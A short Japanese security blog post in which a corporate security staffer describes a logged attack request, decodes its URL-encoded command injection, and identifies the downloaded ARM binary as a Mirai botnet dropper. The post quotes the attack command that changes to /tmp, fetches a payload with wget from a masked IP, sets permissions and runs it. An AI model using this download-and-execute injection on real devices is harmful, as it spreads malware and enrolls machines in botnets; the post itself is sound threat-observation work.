fragiler’s Security blog

某企業でセキュリティ担当しています。まだまだ勉強中の身ですが、遊びがてら発見したセキュリティ関連のことがらを呟こうと思います。

Mirai-BotnetのDropperを落とそうとするアクセス

Struts2攻撃と思われるものに交じって、こんなのが来てました。

 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F
%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33
%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37
%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1」

 

文字列を調べてみたところ「URLデコード」という処理ができそうと分かったので、デコードしてみると…

cd /tmp;wget http://XX.XXX.XXX.XX:54321/dlr.arm;chmod 777 *;./dlr.arm

IPアドレス部分は伏字にしております)

 

何か外部からとってくる命令っぽかったので、wgetで「dlr.arm」とやらを取ってきてみました。

 

マルウェアかなぁと思い、とりあえずFileコマンドで調べると

[tmp]$ file dlr.arm
dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped

何かの実行ファイルっぽい。

 

さすがに実行はヤバそうなのでエディタで開いてみたら…

f:id:fragiler:20170327235737p:plain

Mirai???

GET部分を見てみると、Mirai.armとあるので、Mirai関連の実行ファイルでも落としてくるものなんですかね。

 

と、悶々としていたところ、某セキュリティ調査機関のメルマガでまったく同じものがレポートとして配信されていました。やっぱりwgetで手に入れたマルウェアはMiraiのDropperだったようです。

 

そのレポートによると、このアクセスは北アメリカと日本のサーバーを狙った攻撃キャンペーンで、コマンドインジェクションでDropperダウンロードさせて実行・感染⇒Mirai本体ダウンロードして感染⇒Botnet参加となるようです。

ただし感染には「BusyBox」とやらを導入している必要があるらしい。(←これまた良く分からないので、本日はこれまで…)